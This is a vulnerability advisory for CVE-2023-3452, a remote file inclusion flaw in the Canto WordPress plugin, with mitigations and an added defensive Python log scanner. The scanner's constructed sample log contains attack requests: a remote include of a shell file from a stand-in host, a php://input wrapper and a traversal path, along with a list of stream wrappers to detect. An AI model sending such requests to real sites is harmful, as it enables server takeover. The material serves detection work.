Cyber Resilience

CVE-2023-3452

Severity: Critical
Published: 12 August 2023
Modified: 08 April 2026
KEV Added: not listed
Patch: available
CVSS Score v3.1: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.8711 (99.5th percentile)
Risk Priority: 72 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2023-3452 is a critical-severity PHP Remote File Inclusion (CWE-98) vulnerability in the Canto plugin for WordPress (vendor canto, product canto). Its CVSS 3.1 base score is 9.8 (Critical).

Operationally, its EPSS score of 0.8711 places it in the top 0.5% of CVEs by estimated exploit likelihood, although it is not currently listed in the CISA KEV catalog.

Deeper analysis

The Canto plugin for WordPress is vulnerable to remote file inclusion in versions up to and including 3.0.4. The flaw exists in the handling of the wp_abspath parameter within the tree.php component and is tracked as CWE-98. When the PHP allow_url_include directive is enabled on the server, the issue permits inclusion of arbitrary remote files; note that allow_url_include is Off by default and has been deprecated since PHP 7.4, so the remote variant depends on a non-default server configuration. Local file inclusion is also possible, without that directive, if an attacker can place a malicious file via FTP or another upload path readable by the web server. The vulnerability received a CVSS 3.1 score of 9.8.

Unauthenticated attackers can exploit the weakness over the network without any user interaction or credentials. Successful exploitation grants the ability to execute arbitrary PHP code on the affected WordPress server, resulting in full confidentiality, integrity, and availability impact on the host.

Public references include the vulnerable code in the plugin repository and a subsequent changeset (2951888) that modifies tree.php, indicating an official patch has been issued. The current EPSS score of 0.8711, with a recorded peak of 0.8783, reflects sustained exploitation interest following disclosure.
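Because the page identifies both the endpoint (tree.php) and the parameter (wp_abspath) that carry the inclusion, exploitation attempts are visible in ordinary web-server access logs. The following Python is an added example, not code from the advisory or from the Canto plugin: it parses constructed access-log lines in the Apache/Nginx "combined" format and classifies each wp_abspath value sent to a tree.php endpoint as a remote URL, a PHP stream wrapper, a traversal sequence, or a plain local path. The plugin directory layout, the IP addresses, timestamps and user agents in the sample are assumptions made for illustration.

```python
"""Scan access-log lines for attempts to abuse the wp_abspath parameter of
the Canto plugin's tree.php (CVE-2023-3452).

Added example; not code from the advisory or from the Canto plugin.
Assumptions: Apache/Nginx "combined" log format, and that tree.php is
reached by a request whose query string carries wp_abspath. The path
inside the plugin, IPs, timestamps and user agents are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample traffic (not real). Line 2 carries a harmless-looking
# local path; line 5 is unrelated and must not be reported.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2023:10:01:02 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?wp_abspath=http://203.0.113.9/shell.txt HTTP/1.1" 200 512 "-" "curl/8.1.0"
198.51.100.4 - - [12/Aug/2023:10:02:15 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?wp_abspath=%2Fvar%2Fwww%2Fhtml HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Aug/2023:10:03:41 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?wp_abspath=php://input HTTP/1.1" 500 0 "-" "python-requests/2.31.0"
192.0.2.20 - - [12/Aug/2023:10:04:00 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?wp_abspath=../../../../tmp/evil HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.0.2.21 - - [12/Aug/2023:10:05:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Minimal "combined" format parser: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Schemes that make the include a remote fetch (needs allow_url_include).
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}
# PHP stream wrappers attackers use for inclusion without a remote host;
# several of these are themselves gated by allow_url_include, so a hit may
# be a failed attempt that is still worth triaging.
WRAPPER_SCHEMES = {"php", "data", "phar", "expect", "zip", "glob",
                   "compress.zlib", "compress.bzip2"}
# Require at least two scheme characters so "C:\..." is not read as a scheme.
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]+)://", re.I)
SUSPICIOUS = {"remote_url", "stream_wrapper", "traversal", "unknown_scheme"}


def classify_abspath(value: str) -> str:
    """Classify one wp_abspath value by the kind of include it would cause."""
    v = value.strip()
    m = SCHEME_RE.match(v)
    if m:
        scheme = m.group(1).lower()
        if scheme in REMOTE_SCHEMES:
            return "remote_url"
        if scheme in WRAPPER_SCHEMES:
            return "stream_wrapper"
        return "unknown_scheme"
    # PHP's data wrapper also accepts the RFC 2397 "data:" spelling.
    if v.lower().startswith("data:"):
        return "stream_wrapper"
    # Any ".." segment, with either separator, is a traversal attempt.
    if ".." in v.replace("\\", "/").split("/"):
        return "traversal"
    return "local_path"


def scan_log(text: str) -> list[dict]:
    """Return one finding per wp_abspath value sent to a tree.php endpoint."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # Key on the filename plus the parameter name rather than the plugin
        # directory, which varies between installations.
        if not parts.path.lower().endswith("/tree.php"):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
        for value in query.get("wp_abspath", []):
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "wp_abspath": value,
                "category": classify_abspath(value),
            })
    return findings


def alerts(findings: list[dict]) -> list[dict]:
    """Keep only findings whose wp_abspath value is not a plain local path."""
    return [f for f in findings if f["category"] in SUSPICIOUS]


if __name__ == "__main__":
    for f in alerts(scan_log(SAMPLE_LOG)):
        print(f"{f['ts']} {f['ip']} {f['category']:14} {f['wp_abspath']}")
```

A plain local path is reported as a finding but not as an alert: on a patched site the parameter should not be honoured at all, so even those requests are worth a second look, while the remote-URL, wrapper and traversal cases are the ones to escalate regardless of the HTTP status returned.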

Vulnerability details

The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.

CWE(s)

CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Related Threats

No named threat actor has been attributed to exploitation of this CVE; ATT&CK technique mapping for it is still in progress.

Affected Assets

Vendor: canto
Product: canto (Canto plugin for WordPress)
Versions: ≤ 3.0.4

Mitigating Controls

No mitigating controls have been mapped automatically for this CVE. The controls that follow from the advisory text are:

Update the Canto plugin to a release later than 3.0.4; changeset 2951888, which modifies tree.php, is the official fix.

Keep allow_url_include set to Off in php.ini (its default, and deprecated since PHP 7.4). This closes the remote inclusion path but not the local one.

Restrict FTP and other upload channels, and deny the web server write access to directories it can include from, to close the local file inclusion variant.

Until the plugin is updated, monitor requests to tree.php that carry a wp_abspath parameter, since that parameter is the sole vector described.